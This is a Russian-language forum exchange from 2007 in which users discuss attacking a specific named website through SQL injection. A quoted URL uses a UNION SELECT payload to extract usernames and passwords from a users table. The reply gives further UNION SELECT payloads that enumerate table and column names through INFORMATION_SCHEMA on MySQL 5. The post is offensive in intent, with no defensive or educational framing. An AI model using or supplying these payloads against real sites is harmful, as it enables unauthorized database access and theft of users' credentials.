20.08.2007, 14:02
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047
Репутация:
930
|
|
Сообщение от Qwertison
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:
Код:
union select TABLE_NAME from INFORMATION_SCHEMA.TABLES limit 0,1/*
А потом колонки в интересующей нас табле:
Код:
union select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*
Последний раз редактировалось Ksander; 20.08.2007 в 14:33..
|
|
|